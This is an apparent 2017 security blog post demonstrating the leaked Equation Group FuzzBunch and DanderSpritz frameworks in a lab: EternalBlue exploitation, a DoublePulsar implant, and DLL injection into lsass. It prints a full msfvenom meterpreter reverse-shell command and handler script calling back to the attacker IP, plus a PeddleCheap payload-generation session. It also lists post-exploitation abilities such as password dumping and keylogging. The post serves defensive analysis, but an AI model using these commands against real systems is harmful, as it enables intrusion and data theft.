A peek view in the Equation Group toolbox

Filter by category:

April 16, 2017 by Peter Stiehl
Dans la boite à outils d'Equation Group
This article aims to introduce the framework that has been disclosed through an article posted by ShadowBrokers, focusing on two tools, FuzzBunch and DanderSpritz, and their associated modules. These different tools are present in the file windows.tar.xz.gpg accessible through this link.
 
After some research, it is necessary to set up some technical environment to use of the tools. The following dependencies must be installed on a Microsoft operating system:
  • Python 2.6 ;
  • Pywin32 ;
  • Java.

Some additional steps that are necessary in order to use all the tools have been deliberately omitted, the objective of this note being to measure the nature and reality of the information made available.

It is also important to underline that the tools specific to the exploitation of the vulnerabilities, or used during the different phases are compiled for an x86 architecture and that the sources of the binaries are not available.

The host used to attack is a Windows 7 x64 operating system and the target is a Windows Server 2008 x64 without the latest updates applied.

Here is an example of how to use the FuzzBunch framework, which can be accessed through the fb.py script, after the installation of the necessary dependencies, and by modifying the FuzzBunch.xml configuration file. The interface look like another well-known framework, called Metasploit:

Démarrage de FuzzBunch

As soon as the framework is executed, various configuration elements are required:
  • The IP address of the target as well as the one of the attacker;
  • Indicate whether the redirection option will be used, maybe be used by a tool allowing the establishment of tunnels between the attacking machine and its target;
  • The folder collecting the logs of the tool;
  • And finally, a project name.
Configuration initiale

In this case, the target is accessible through the IP address 192.168.69.42. The attacking machine has the IP address 192.168.69.5.

The tool is rather simple to handle: autocompletion of arguments, invitation to enter the configuration elements and even the availability of a help command:

Commande help

The use command is the one used to enter the context of a selected plugin, here is the list:

Liste des commandes

These plugins are dispatched into several categories:
  • Information gathering of the target and discovery of exploitable vulnerabilities: Architouch, Rpctouch, Domaintouch, Smbtouch, etc. ;
  • Exploiting vulnerabilities: Emeraldthread, Eclipsedwing, Eternal*, etc. ;
  • Post-exploitation after infection of the target: DouplePulsar, Regread, Regwrite, ...
Then begins the use of information gathering tools. First of all, Rpctouch makes it possible to fingerprint the target:

Rpctouch

Then, Smbtouch queries the target through the SMB protocol to retrieve the version and architecture of the operating system, accessible pipes and lists the exploitable vulnerabilities through the framework:

Smbtouch

In this example, the target system appears vulnerable to 3 different vulnerabilities (EternalBlue, EternalRomance and EternalChampion). The exploitation phase of vulnerability is therefore possible, with for example EternalBlue. During the execution of the plugin, the data recovered through the recognition phase are accessible, which makes the execution even simpler:

EternalBlue

Once the necessary parameters have been configured, the installation and usage of the backdoor is possible:

Exploitation avec EternalBlue

The final message indicates that the attack was successful, which took only ten seconds. The backdoor then allows other framework capabilities to be used against the target.

The post-exploitation phase can then start using the DoublePulsar plugin. The backdoor is composed of several major functionalities:
  • OutputInstall: used to generate a shellcode to install the backdoor, mainly to use upstream with eg Eternalromance;
  • Ping: check if the backdoor has already been deployed on the target;
  • Uninstall: used to uninstall the backdoor on the target system;
  • RunShellcode: run its own assembly code;
  • RunDLL: run a DLL within a process.
In order to test the end-to-end attack, a DLL was generated with the msfvenom tool of the MSF  using the following command:

$ msfvenom -p windows/x64/meterpreter/reverse_https LPORT=443 LHOST=192.168.69.5 -f dll -o simple.dll

Then a handler was started to control the target afterwards:

$ cat handler.rc

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set EnableStageEncoding true
set ExitOnSession false
exploit -j

$ sudo msfconsole -r handler.rc
[...]
[*] Processing handler.rc for ERB directives.
resource (handler.rc)> use exploit/multi/handler
resource (handler.rc)> set PAYLOAD windows/x64/meterpreter/reverse_https
PAYLOAD => windows/x64/meterpreter/reverse_https
resource (handler.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (handler.rc)> set LPORT 443
LPORT => 443
resource (handler.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (handler.rc)> set ExitOnSession false
ExitOnSession => false
resource (handler.rc)> exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] Starting the payload handler...
msf exploit(handler) >
Last step is to configure the DoublePulsar RunDLL function and run it:

Exécution de DLL

Thus, the connection is established through the injection of the DLL within lsass.exe process  and it is possible to control the target through MSF:

Récupération du shell

The privilegies retrieved on the target are those of the NT AUTHORITY/SYSTEM account, otherwise it would not have been possible to inject into the lsass.exe process.

This is only an introduction of the framework capabilities : the tool is indeed much more complex than it seems.

Another tool available called DanderSpritz provides a graphical interface. It is first necessary to configure some parameters through the call of the configure_lb.py script:

Paramètrage de DanderSpritz

New features are available :

DanderSpritz

Its basic use is less instinctive than FuzzBunch. The first interesting feature is PeddleCheap which offers several options:
  • Connect : used to connect to a previously backdoor target with DoublePulsar;
  • Listen : used to create a listener on which targets will connect back;
  • Trigger : used to create a listener on the target or to ask it to connect to an existing listener.
Here is the menu once the Trigger option is selected:

Option Trigger de PeddleCheap

The problem is to find out how it works ... Fortunately a help command is available in the terminal:

Commande Help

The number of commands available is far more important than in FuzzBunch, the approach is not obvious, some commands are not very explicit, but after a little research, the command pc_prep appears to be responsible for the generation of payloads:

pc_prep menu

This reminds a bit of msfvenom. By using the pc_prep -sharedlib command to generate a payload as a DLL, an interactive dialog is initiated to configure it:
08:03:14>> pc_prep -sharedlib
[08:03:14] ID: 137 'python' started [target: z0.0.0.1]
- Possible payloads:
-      0) - Quit
-      1) - Standard TCP (i386-winnt Level3 sharedlib)
-      2) - HTTP Proxy (i386-winnt Level3 sharedlib)
-      3) - Standard TCP (x64-winnt Level3 sharedlib)
-      4) - HTTP Proxy (x64-winnt Level3 sharedlib)
-      5) - Standard TCP Generic (i386-winnt Level4 sharedlib)
-      6) - HTTP Proxy Generic (i386-winnt Level4 sharedlib)
-      7) - Standard TCP AppCompat-enabled (i386-winnt Level4 sharedlib)
-      8) - HTTP Proxy AppCompat-enabled (i386-winnt Level4 sharedlib)
-      9) - Standard TCP UtilityBurst-enabled (i386-winnt Level4 sharedlib)
-     10) - HTTP Proxy UtilityBurst-enabled (i386-winnt Level4 sharedlib)
-     11) - Standard TCP WinsockHelperApi-enabled (i386-winnt Level4 sharedlib)
-     12) - HTTP Proxy WinsockHelperApi-enabled (i386-winnt Level4 sharedlib)
-     13) - Standard TCP (x64-winnt Level4 sharedlib)
-     14) - HTTP Proxy (x64-winnt Level4 sharedlib)
-     15) - Standard TCP AppCompat-enabled (x64-winnt Level4 sharedlib)
-     16) - HTTP Proxy AppCompat-enabled (x64-winnt Level4 sharedlib)
-     17) - Standard TCP WinsockHelperApi-enabled (x64-winnt Level4 sharedlib)
-     18) - HTTP Proxy WinsockHelperApi-enabled (x64-winnt Level4 sharedlib)
Pick the payload type
3
Update advanced settings
NO
Perform IMMEDIATE CALLBACK?
YES
Enter the PC ID [0]
0
Do you want to LISTEN?
NO
Enter the callback address (127.0.0.1 = no callback) [127.0.0.1]
192.168.69.5
Change CALLBACK PORTS?
NO
Change exe name in version information?
NO
- Pick a key
-   0) Exit
-   1) Create a new key
-   2) Default
Enter the desired option
2
- Configuration:
-
- <?xml version='1.0' encoding='UTF-8' ?>
- <PCConfig>
-   <Flags>
-     <PCHEAP_CONFIG_FLAG_CALLBACK_NOW/>
-     <PCHEAP_CONFIG_FLAG_DONT_CREATE_WINDOW/>
-   </Flags>
-   <Id>0x0</Id>
-   <StartListenHour>0</StartListenHour>
-   <StopListenHour>0</StopListenHour>
-   <CallbackAddress>192.168.69.5</CallbackAddress>
- </PCConfig>
-
Is this configuration valid
YES
Do you want to configure with FC?
NO
- Configured binary at:
-   C:\logs\dsdemo\z0.0.0.1/Payloads/PeddleCheap_2017_04_16_08h03m20s.344/PC_Level3_dll.configured

Then, a listener is configured through PeddleCheap. It is only possible to listen through TCP services or HTTP. Here, it is set by default to match the previously generated payload. It then listens on ports TCP/53, TCP/80, TCP/443, TCP/1509:

Listerner actif

Now it is necessary to send the generated DLL to the target; In order to do this, DoublePulsar is again used as in the demonstration of the injection presented before:

Injection de DLL

A connection is then received and it is requested to accept it. Once the connection is accepted, the terminal begins to scroll through a lot of information about the target:
  • The status of network adapters and its configuration;
  • Information about the target system;
  • The list of processes (some processes such as those used by virtualization are highlighted in another color);
  • The uptime;
  • The list of drivers loaded with a comparison of fingerprints with an existing database:

Connection établie

Démarrage

Then various commands are executed automatically. Some require confirmation of their execution:
  • Dork security auditing;
  • Monitors : supervision of the ARP table, netstat, and network activities;
  • Scheduler survey : analysis of scheduled tasks;
  • Persistence checks : checks if persistence is enabled;
  • Password dump;
  • OS information : the language of installation as well as the version of the operating system;
  • Networking Information : retrieves the FQDN and the DNS server used, as well as the status of the network adapters and their configuration;
  • Route table : the routing table;
  • ARP table : the ARP table;
  • NETBIOS : retrieval of information through the NETBIOS protocol;
  • Memory usage information : memory status;
  • Disk list and space info : list of disks and space available;
  • USB survey info : information about USB.
Once these steps are over, it is then possible to carry out a whole bunch of attacks on the target through various commands. Here is a sample of the possibilities offered by the commands:
  • Retrieving information about the target system;
  • Establishment of tunnels;
  • Using the target to attack others;
  • Screenshot;
  • Port scanning;
  • Network traffic capture;
  • Disabling password control during authentication for a user;
  • Retrieve information about an active domain directory (users, groups, computers, ...);
  • Manipulation of processes;
  • Retrieving secrets stored by skype, chrome, firefox, ... ;
  • Installing keylogging features;
  • And so on ...
Finally, here are some screenshots of other panels provided by the tool:
  • Execution of commands through a shell on the target:
Exécution de commande
  • Processes manipulation :
Manipulation de processus
  • Logs :

Journal d'événements

Again, this is only an introduction of what it is possible to perform through DanderSpritz.

The more deep the study becomes, the more complex it seems. Also, some commands do not work because files are missing. It is very likely that there is still much to discover.

The use of these tools, now available to everyone, shows that they are stable, modular and efficient. There is no doubt that a significant investment has been made to develop all of these components. Comprehensive analysis work will now be required to generate compromise indicators and see if an intrusion has been made with the help of these tools.